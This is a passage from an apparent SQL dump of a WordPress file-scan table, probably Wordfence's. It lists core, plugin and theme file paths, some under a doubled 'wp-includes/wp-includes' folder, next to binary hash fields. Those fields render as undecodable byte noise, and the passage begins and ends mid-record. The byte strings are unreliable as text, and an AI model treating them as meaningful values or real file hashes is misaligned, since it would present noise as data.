&jِ�','',0,'?'),('��u����crD�z','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-strip_exif.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��wM���E�yMݼ','UT;5ɑG˾pB�[&N�TZlD��`!�a��','',0,'?'),('���ԫ���G','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png',0,'�_���Pw��PU�4','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�r�W�3���᥾V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�p�ES���c�V','�<�=\0�[Z\n2|닢��\0?6������������','',0,'?'),('���ኺ`)�7�n','wp-content/plugins/all-in-one-wp-security-and-firewall/images/notices/updraft_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�n(t9v̈́N�','.�Z�1i�.��Ӂ�\0��1��*R�+Ü	S�)]','',0,'?'),('��X�;5*˞��a#�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/uk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�盌x��vL\r��','R�}�I�I	B	rE�A>?�n�v���c��\r','',0,'?'),('kƌC\09��6\"[��','wp-content/plugins/wordfence/css/license/response.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?Vj�B!�D�{�B\r�','�6�I^�(��1�*G�mE9-ne:R)�G֎���','',0,'?'),('^E��d��PM9dz','wp-content/plugins/wordpress-seo/admin/class-admin-asset-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*]���j~�G��b#l','����2۞�W1�h跺��V��%��8��5�','',0,'?'),('@�9����%4�y','wp-includes/wp-includes/widgets/class-wp-widget-meta.php',0,'ha�+��ޭj�s2���','ha�+��ޭj�s2���','f��\r`.\\�۬\r�����H�Pg���!M�w�m��','',0,'?'),('5E/���Gb�0�','wp-content/plugins/wp-fastest-cache/images/label-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wǜ�D�͙�A��2','��@�J��bVx��qr����|���K�F6�','',0,'?'),('9+��$yl�R�2��','wp-content/plugins/wordpress-seo/src/deprecated/admin/recalculate/class-recalculate-terms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�\\��?\0컅�','1\"\n����Ę�;렦�V�0�|\nH��\Z&$)�','',0,'?'),(':�X��2�M��~��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�4vLhN�!��2|','���3iA(���p���GD��ڔ����','',0,'?'),('>�SA��^���Ž','wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js',0,'���\\��5^����','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('Br��,�z�XG#Nj>','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/RequestOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�{2��;n\'�O��','���BY�/5��vP]�j�笶�|��T9�\Z','',0,'?'),('C�y��8�\'a���','wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0mj���Ԟ�W','�͛=��ېI�hK�g\0��%T.��]��\r��~','',0,'?'),('K�����\"�/�]','wp-content/plugins/wp-fastest-cache/images/photoncdn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}r	��vZ��ꭶ��','���\"�!o�KE�0w���셭���*iY�$','',0,'?'),('L���8��\\�ݼ+','wp-admin/images/imgedit-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\'��6U�������t','�?�؎)�.l�����%�<�(�_� 6�`^c7','',0,'?'),('V�	�F�<Tp�*���','wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-prepare-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�39�BDk�]\r ','f\"�cp�V�l�+�;�N����Vi��D���	','',0,'?'),('Z��T�:rIG�g\\�','wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',0,'�ZƾB�,J)T�cx','�ZƾB�,J)T�cx','\0IM���|%�c��t�\0�Φ���q��s��5','',0,'?'),('aI�n��i�މ�W�','wp-content/plugins/wp-smushit/app/assets/images/smush-webp-test.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.#9�L����fU��','ۅ�t�n{ԍ���BY���/8}','',0,'?'),('m�ñ�~���R�?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o���\n2���0���\0','aG�ִ\nOk�&1���`3�*��ҿf���_W�','',0,'?'),('p۞�2N<:Z�7�r�','wp-includes/js/tw-sack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('tRg_x\Z�K�j\nm�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ko_KR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!X�ԟ��b3m��g�I','�B�4�h��o�/�i�y��rw\0r\\k�� ��׳','',0,'?'),('u�)8FG9�C�(���','wp-includes/js/wp-ajax-response.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V����efO�:�t\nd�','x���Q��?/�X��7�:�>%X�f�A�P','',0,'?'),('�6��d7��Cπ','wp-content/plugins/wordpress-seo/src/integrations/front-end/theme-titles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R��^T�S������\r','�B[��ʧQ�Ѫ��ѽ�`�DW���r!����','',0,'?'),('��c�O�@�/�lM�','wp-includes/blocks/separator/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�|P��0�c�`��8','����c�S^?�u���Ny�TE��׈���','',0,'?'),('�)�:�F�:!�','wp-content/plugins/wp-cerber/languages/wp-cerber-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t71���ۅBL�f��','#�}/��u$�z:��z�����l�4�0Ր','',0,'?'),('����9�~\0{@���','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','®���uM�����','�JE�z����ٙ6������)P��)��\0��','',0,'?'),('��cc�|�v6Buae','wp-content/plugins/wp-smushit/app/assets/images/firefox-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jN�,�7�0s\"��|','�(`o�;T�°D�ITT��=$�V:Ҧǔg�','',0,'?'),('�yP:H�<���\0����','wp-content/themes/hitmag/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1n\0�x�!���q]��','?�ԫ��Y�\0���\\#�\"J?:�׊9R�M��','',0,'?'),('���Clo�������','wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f]��J��d��1ȭ','.��)�I\Z��S��p��/���4���=L��T�','',0,'?'),('���?t�NR��R/','wp-content/plugins/wordpress-seo/js/dist/languages/pt.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vA�~RH�\'��mc�','�]6g��r�,�WhǣH�-E�VS�ln���','',0,'?'),('���[s&i�u)�n','wp-includes/blocks/video/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�/���_���g�w�5','a��K:N\\P\"Qf��t�$C��y/�g��','',0,'?'),('�&�	Y�tz(�\Z��','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\�0*���	[����','f���8��\'!�RF���L���˙^�w��','',0,'?'),('�`�1ܸQ���%�','wp-content/themes/twentytwentythree/templates/archive.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�����Թ�nk+','��H�����/H5HW��Sa1 J�W��PT�','',0,'?'),('��I<���U�CMdZ�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nA�I�g��+��.','5�N叜p�o\'�GYNsC�IS��>LJ�','',0,'?'),('��-��i>bs��1�','wp-includes/js/jquery/ui/resizable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	姫/�C_�-���B','�>\\�h��K��K\'����\Z�\n��ZC��Hz','',0,'?'),('4�J�-<O�iDf�.�','wp-content/plugins/wordpress-seo/admin/class-yoast-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B>�@�Q�O�M�ߴ','E�2M�Q!t\n\"��j�\'��8���zZ��Y�F','',0,'?'),(']zJ�S3�\'�k�>','wp-content/plugins/wordpress-seo/images/new-to-configuration-notice.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C(`��|Uv��w���','a�\'\Z��<zd����3�(�C�;x@`T��^��','',0,'?'),('^V�RD<;�� ��3T','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_TW.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��]�s�?\0�cy���(','b�w�r7��Ňg{ZW����\Zا9���','',0,'?'),('c�� ȵ�E9jz[�','wp-includes/blocks/code/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rAq�O��Эx�_�P','���뜷H�B�?����O���4��z�\'\n�4�','',0,'?'),('m0\"r��4�R�u','wp-includes/wp-includes/js/zxcvbn-async.js',0,'=�$a�[ZF)^\n��~','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('w�7�v+�q1�\Z���','wp-includes/blocks/list/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�.{�:�6`�,t�ee','[��x��8AL���lz8m9(�\r�\r\0,}�N','',0,'?'),('~��Y��(�C��','wp-includes/wp-includes/css/dist/block-library/common.min.css',0,'��XBI���mC�','��XBI���mC�','Q�E��e��\r��_�1�Pj���W�r�','',0,'?'),('��4r�%����j���','wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�ʙ�Z\0(hK��HR','8^V�����c����Ì?os��s���S','',0,'?'),('��KS+�e׎A�@��','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z,=Ӳ~����h&��C','t<�U@�J֔\r%��\"bD*@�YI�\'p�*n�uI�','',0,'?'),('�� �q4�8;j�-�','wp-content/plugins/wp-smushit/_src/react/views/webp/step-footer.jsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�c��g4��x#o�','f�y��\"�w�a�톙�*7䴁�yW�,t�','',0,'?'),('�����Fe�	57[�','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��3岛�u�`�At','m)Th�)�\"=>�#a���Z;V<\0`�h	�5�w','',0,'?'),('�D*;v(�.Ҳ�N','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[���)!O��d���k','P���;�+P���˻Z5&h��q�J���F','',0,'?'),('����UNEA�g�t','wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('���N��=��	�\'5','wp-content/plugins/wp-cerber/assets/flags/mk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f^(�j�g��p�','�+%}�vc*2�d_/4���\'�V���eb�1','',0,'?'),('��������=��','wp-content/plugins/wp-smushit/app/pages/class-cdn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\Z�Kj���~5,1','��0>/AM�\r�S�(��ˣ���H�P�O%','',0,'?'),('�A�o�!�V��ų`v','wp-content/wflogs/ips.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('��v�i� w�Dz�','wp-content/plugins/redirection/locale/redirection-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[�4�1>�p\n��|','D䉎���mD���A���ї3Opm �cv��','',0,'?'),('�t�YSQ/[��R�C','wp-includes/blocks/gallery/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4���\Z%�g�J7e�','\'p9.JF*om�r���]��\"�N���H/���','',0,'?'),('��W�����%�Ȏ�','wp-content/plugins/wordpress-seo/packages/js/images/motivated_bubble_woman_1_optim.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!����)~	�3?)','���-|$_�v�$�E�\nu,!�\"C�&?�A','',0,'?'),('1L�a�s���~�','wp-content/plugins/wp-fastest-cache/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C,^=]\0��6�Y�O��','o�_�g��+���IG�//��`����`��L!<�','',0,'?'),(' o��ƕ��t_��\0.�','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���+��\'|�','�C�Z���hau�ݣ�K�Cif!�����\'~F�p','',0,'?'),('%~WN82��Q�O���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4�F��0JC� n��k','�Cb,���\"�\">j���Ŋ��AlD�','',0,'?'),(';�\0v�z��Xz<C�AI','wp-content/plugins/redirection/database/schema/231.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�],N�:��p��3�','���iP�x�]v��Ӱy6����zП3d8n��/','',0,'?'),('G�%%�as)~^j��ؾ','wp-includes/wp-includes/js/customize-models.min.js',0,'/�o�ϱ;��Rwc','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('H���~{ppN)�聻','wp-content/plugins/wordpress-seo/src/presenters/admin/help-link-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;�_��}3o','����t>M�ѓf����7���h�J����','',0,'?'),('Ugy b6��M��gd�\0','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�:����5�\r���','=���jP�\'^�qm�.��{PHQό�&4Zs	','',0,'?'),('[\r%M�{/tRe��','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dT�)XS[���<���','0T��͠�h3�Җ�\"�ˬ�\'\r�WS','',0,'?'),('\\���\Z�e	�)��Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH�\Zb�>V�D��R2','rћJԑI/�\nO�Y}�x��ņ����U ','',0,'?'),('^p��\0��j#\"Ĉ�','wp-includes/css/dist/block-library/elements-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sH���H㑡� �','/�hLLʭ�ShH�����J�Ժ4 � \"�?�A@','',0,'?'),('o�ƙv����$��','wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js',0,'7E�~?V�֬��o�B','7E�~?V�֬��o�B','b1�r�������J�w���./2�M��`','',0,'?'),('tɴ���&(�����','wp-content/plugins/wordfence/js/wfpopover.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�&m�A�hlMPZX','��_.V袏���X��4N�i_�k=��C3','',0,'?'),('w���+\0���2�R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('��R���u���N','wp-content/plugins/wordpress-seo/js/dist/externals/socialMetadataForms.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J;[���|�epK','�N���(;���O��xtQ�)V�򒏰(ĺ��','',0,'?'),('��F}��tб7�Y�k','wp-content/plugins/wp-fastest-cache/inc/wp-polls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|��W��Kѹb$S�','*ҥF1My�7>qG�jX�4牗,%�^nmE$��','',0,'?'),('�-��B��|tS^�','wp-includes/customize/class-wp-customize-nav-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('�ECW��`�`��-�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_@�e���3�b��B','�L�ؤ@J�9OhG�@@��Z!��\08#l�(','',0,'?'),('��=�*�����R�','wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php',0,'O�P��/:���#�A','O�P��/:���#�A','��P����!𴴨jz�F#�����d�ĚMP','',0,'?'),('��+���>��\"�s�','wp-includes/wp-includes/images/xit-2x.gif',0,'�Ӂ�u:@4\r���z<5�','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�_v�DO�2��\ZT�/','wp-includes/wp-includes/css/wp-auth-check-rtl.css',0,'N�P��KN��zj��K','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('���K����d�F�','wp-content/plugins/wp-smushit/app/assets/js/smush-react-webp.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�ܒ�|�ܒ�3�o','���g$������%1D6e��nw�˅ih\'\\','',0,'?'),('΢�S˪�\n��B�V\"','wp-includes/fonts/dashicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�3$_�n��5��X',';ʐ\'8�4aOoY8-U�62���K�qq�$B�x','',0,'?'),('��\\��h\Z��)Ġ�','wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�g\'�B2�D��','�8/�p��nƁ2:4<��\'s��By�{�2n�','',0,'?'),('���^�@#��d�Vѩ','wp-content/plugins/wordpress-seo/src/services/health-check/links-table-runner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�@^�Щ�8�,+��','�����umR���E�\"�����Cm茅�Y�','',0,'?'),('�*Q.	�-c�%�D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��c�磭��c�-','8�Y��CO���0�j{�\Zx��D�Ė��x�O�','',0,'?'),('�u�!H��-:/��w\"�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�Z}��y���7�#�(','!�Ħ�xt���ʼ�(\r�T�R������l!','',0,'?'),('�v|Q/B}�M�\r`��','wp-includes/wp-includes/js/dist/api-fetch.js',0,'-zLܗ�G��3�|4y','-zLܗ�G��3�|4y','e�9����x^h�Ǔ|B�1u��2t�\'�Y�\n	','',0,'?'),('\n	M�I�~�YEO��]�','wp-includes/blocks/post-featured-image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�.T��L9�Nm��','\"� +�h8�lx&9Ǝ��S�­3<{����','',0,'?'),('\nE(4.�-���)��]','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܉5����Dn�<%gT','cB��n�u�Y�Lh�$�7w���v��H�','',0,'?'),('� \Zq�Tl`','wp-content/plugins/wp-cerber/assets/flags/np.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7y��S��]@9���pYg','\Z��<�\nW\r��ϐ�M���=�~��ae;�B�','',0,'?'),('��ܡ9�u_\\\n�9�\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x��Ti6���','ۣq��T��zu���Oi�\\�5ЯY�u��~=c','',0,'?'),('Ʀ�+����W�f3','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7dž�唝�\0q�2�','#/{�%�O\ZM��*��p9�:�*�_^�\"�:Q�','',0,'?'),('�KU�g0MU�/��ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xo��_���Բ)\n��r','�(�Z!.�e��TU92;�����ݏt5o�^','',0,'?'),('\Z[�`��0CI$T��\'�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�H��$I�3��^0','Dsmr?v�jz����Mo�3=b0���K�R#','',0,'?'),('\\�*�\"l)��f��S','wp-content/plugins/wordpress-seo/css/dist/modal-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z2�rˊ)�ߝ�w:��','�0x��	q*�Έ����	�j���!�l��','',0,'?'),('4;V��\'�/����f�','wp-includes/js/jquery/ui/effect-scale.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N4�폢D^��+','\r$9��%4�N�r��7���2��(��r���Ϩ','',0,'?'),('7���OW\n@�a','wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�n��9��>��m�_','��@�#����+r٠&���1J�YX�0','',0,'?'),(':�f�?bj���.���','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']#{�1�����&v�','�^P�b.|�=>�S����#\'\r�l�]�^�','',0,'?'),('?�-���H����+�','wp-includes/wp-includes/rss.php',0,'�4|����e��(r','�4|����e��(r',':��.,�0aH�A��\05:�f�s\nf������','',0,'?'),('HK���q���<<�3\n�','wp-includes/blocks/navigation/view-modal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<����7�njp1��x','>p�E�;A\n�������q�݃���,(2�	','',0,'?'),('M9\0U�H�%> �%�J�','wp-includes/wp-includes/plugin.php',0,'g�v/�M��;�7/N:','g�v/�M��;�7/N:','AI�OZl���wC�fj�@�r}���H!ѧ�Q','',0,'?'),('T�Ę5VH���P{��','wp-includes/Requests/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Flkٮ�<v�wSH�\\','-@��g %�����uON\\}@l���f\'���','',0,'?'),('q�Z��瓍��>�!','wp-content/themes/hitmag/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�Z����my�1�P�','��+�*��T1�(�F�����J�������','',0,'?'),('��;�*�F\'u����','wp-includes/blocks/code/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0<o,�%S�]Zn�S�','.��D_O�Dч�|Au�s��݇g4��e��','',0,'?'),('���C\n���U���','wp-admin/js/custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݎ�\Z���\Zڸ���','��v�N����;d�V��5d���t�,�','',0,'?'),('��0l��j�0+%�','wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('��ٕ2�*����NI�','wp-content/plugins/wordpress-seo/admin/menu/class-network-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>YT����.p���','f\Z�$B��m��9cy���1�J�} �Bwj\n','',0,'?'),('�<���@Ô�};\"tV','wp-content/plugins/wp-fastest-cache/js/lang/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Fȇ���Mr���','<�=8fS823���&��Ao�\r�\"�2����','',0,'?'),('���cŖa�[��Mc*','wp-includes/wp-includes/js/dist/priority-queue.js',0,'����A�<_\r^،','����A�<_\r^،','-өw�r��\n�ϸ�`�g-7�����.�c�?�','',0,'?'),('֮�V�7���|[+<8F','wp-includes/wp-includes/customize/class-wp-customize-color-control.php',0,'�&��S?��|��G','�&��S?��|��G','h	�3|:Q9z���4Y1[�{^�	$;�#�q��','',0,'?'),('�>�*a�\\A8g��F$','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&κy�F�w�Ӗ�\0Hv','�A���Dv��.H�%J�Iׁ|�>*e�M','',0,'?'),('���窒�u��\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N�;\'��M��� Y','���\Z�7\0��r€/i��z;ki,�=L�Z�g���','',0,'?'),('�)����t\r�,�Jڼ','wp-admin/options-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n �N�Y��Fr��:','��r�R�YLX�	��\\���P�JL(�	�H�','',0,'?'),('���vL���:J����','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@�Z�ɳ�|3�','��_��i���c���B���7H�%K ��','',0,'?'),('�ֆ�\"+[� �ƠI','wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js',0,'2�8��:s��w�9�J��','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�?DŽ����:\n��X','wp-includes/customize/class-wp-customize-theme-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.#�u\r27���fh�v','��甘Ʒ��Ar�a��u<_@���bM�Ue�','',0,'?'),('\Z��) �%iy�δ','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('�FPx���I]','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/QRCodeException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�+}U���a,<�','��\n�JK��Ep�E�����_VP��ظ9����Z','',0,'?'),('3�қ!`�&��,�N','wp-includes/wp-includes/js/jquery/ui/mouse.min.js',0,'���J�;��ty����','���J�;��ty����','�G������[&�~ͤ�E3�	�z͟��ӱ�','',0,'?'),('3�d����yj�����V','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@O<�.<)�$�ޓ��','\Zޛp���	���>��B*\'��^����T�','',0,'?'),(':����n�2��2','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-dimensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.`NN�b���IR�\Z','�0�Z6�-�o���P���\r��7�4S','',0,'?'),('JD�\ZS�/�o��77/','wp-content/plugins/wordpress-seo/admin/views/class-yoast-input-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�������q��=�','�ݱ1\0E�\rpct�´�r6�C�[��3-��','',0,'?'),('R�r�r�(�ȟ��P�','wp-includes/blocks/media-text/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k���&�*����6�0','�d�z���˝��Gt�1�(���2o��)F��','',0,'?'),('Wl��y:�\0Vn`�d\0�','wp-includes/js/tinymce/plugins/wpview/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"����	���qG�','�>q��Qp����+�*��Cx��<���','',0,'?'),('X��r�����\"^}��','wp-content/themes/hitmag/css/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���vre����\n�`�','�X�;��Ɛ��9�@u�j�m�[��F�\"!�','',0,'?'),('[�Y[���j��Lj�G�','wp-includes/blocks/search/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z��嘻�S','��-N�k\"�,[�[�j�_t -�X�O����','',0,'?'),('h8�ʯn��-��	*','wp-includes/blocks/buttons/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0{\"=0E��d�9','Q��o$$̐S���WD��}	�{W��.N','',0,'?'),('q�[H\re�[�{����','wp-content/plugins/wordpress-seo/js/dist/languages/ar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6~N�j~���S�0H','^�g.��	